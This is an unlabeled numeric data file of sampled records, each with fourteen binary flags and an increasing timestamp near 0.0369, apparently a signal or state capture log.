1,1,1,0,0,0,0,0,0,1,0,0,0,0,3.6807508e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6807512e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6807556e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6807580e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6807588e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6807604e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6807632e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6807656e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6807684e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6807704e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6807732e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6807780e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6807804e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6807812e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6807832e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6807856e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6807884e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6807904e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6807932e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6807956e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6807980e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6808004e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6808012e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6808060e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6808080e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,3.6808088e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6808092e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6808104e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6808132e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6808180e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6808204e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6808232e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6808256e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6808284e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6808304e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,3.6808312e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6808316e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6808356e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6808380e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6808404e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6808432e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6808456e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6808484e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6808504e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6808532e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6808556e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6808580e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6808604e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6808632e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6808656e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6808684e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6808704e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6808732e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6808756e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6808780e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6808788e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6808832e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6808856e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6808864e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6808884e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6808904e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6808912e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6808956e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6808980e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6808988e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6809004e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6809032e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6809056e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6809084e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6809108e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6809132e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6809156e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6809180e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6809188e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6809232e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6809256e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6809264e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6809284e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6809308e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6809332e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6809356e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6809380e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6809404e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6809432e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6809456e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6809484e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6809508e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6809532e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6809556e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6809580e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6809604e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6809632e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6809656e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6809684e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6809708e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6809732e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6809756e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6809780e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6809804e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6809832e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6809856e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6809884e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6809908e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6809932e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6809956e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6809980e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6810004e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6810028e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6810052e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6810080e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6810104e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,3.6934480e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,3.6934652e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.6934672e-02 0,0,0,1,0,0,0,0,0,0,0,1,0,1,3.6934704e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.6934724e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,3.6935028e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.6935052e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,3.6935076e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.6935100e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,3.6935124e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.6935152e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,3.6935176e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.6935204e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,3.6935228e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.6935252e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,1,3.6935256e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,1,3.6935300e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6935316e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6935324e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,3.6935332e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6935336e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6935352e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6935376e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6935428e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6935452e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6935476e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6935500e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6935524e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6935552e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6935576e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6935604e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6935628e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6935652e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6935656e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6935700e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6935728e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6935732e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6935752e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6935776e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6935780e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6935828e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6935852e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6935860e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6935876e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6935900e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6935924e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6935952e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6935976e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6936004e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6936028e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6936052e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6936100e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6936128e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6936152e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6936176e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6936228e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6936252e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6936276e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6936300e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6936324e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6936352e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6936376e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6936404e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6936428e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6936452e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6936456e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6936500e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6936524e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6936532e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6936552e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6936576e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6936604e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6936628e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6936652e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6936676e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6936700e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6936724e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6936752e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6936776e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6936804e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6936828e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6936852e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6936876e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6936900e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6936924e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6936952e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6936976e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6936980e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6937028e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6937052e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6937060e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6937076e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6937100e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6937124e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6937152e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6937176e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6937204e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6937252e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6937276e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6937284e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6937300e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6937324e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6937332e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6937352e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6937376e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6937404e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6937428e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6937452e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6937476e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6937500e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6937524e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6937580e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6937604e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6937628e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6937652e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6937660e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6937676e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6937700e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6937752e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6937780e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6937804e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6937828e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6937852e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6937876e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6937884e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6937900e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6937924e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6937952e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6937976e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6937984e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6938028e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6938052e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6938076e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6938100e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6938124e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6938152e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6938176e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6938204e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6938228e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6938252e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6938276e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6938300e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6938324e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6938352e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6938376e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6938404e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6938428e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6938452e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6938456e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6938500e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6938528e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6938532e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6938580e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6938604e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6938628e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6938652e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6938676e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6938700e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6938728e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6938752e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6938756e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6938804e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6938828e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6938836e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6938852e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6938876e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6938900e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6938924e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6938952e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6938976e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6939004e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6939028e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6939032e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6939076e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6939100e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6939108e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6939128e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6939152e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6939176e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6939204e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6939228e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6939252e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6939276e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6939300e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6939328e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6939352e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6939376e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6939404e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6939452e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6939476e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6939484e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6939500e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6939524e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6939552e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6939576e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6939604e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6939628e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6939632e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6939676e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6939700e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6939708e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6939728e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6939752e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6939776e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6939804e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6939828e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6939852e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6939876e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6939900e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6939908e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6939952e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6939980e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6939984e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6940004e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6940028e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6940032e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6940076e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6940100e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6940108e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6940128e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6940152e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6940180e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6940200e-02 0,0,0,1,0,0,0,0,0,1,0,0,0,0,3.6940204e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6940208e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6940228e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6940252e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6940260e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6940300e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6940328e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6940352e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6940372e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6940400e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6940428e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6940476e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6940500e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6940528e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6940552e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6940572e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6940600e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6940628e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6940652e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6940676e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6940700e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6940704e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6940752e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6940772e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6940784e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6940800e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6940828e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6940876e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6940900e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6940908e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6940924e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6940952e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6940976e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6941000e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6941028e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6941052e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6941076e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6941100e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6941108e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.6941152e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6941172e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6941184e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6941200e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6941228e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6941252e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6941276e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6941300e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6941324e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6941352e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6941376e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6941400e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6941428e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6941452e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6941476e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6941500e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6941524e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6941552e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6941576e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6941600e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6941628e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6941652e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6941676e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6941700e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6941724e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6941752e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6941776e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6941804e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6941828e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6941852e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6941876e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6941900e-02 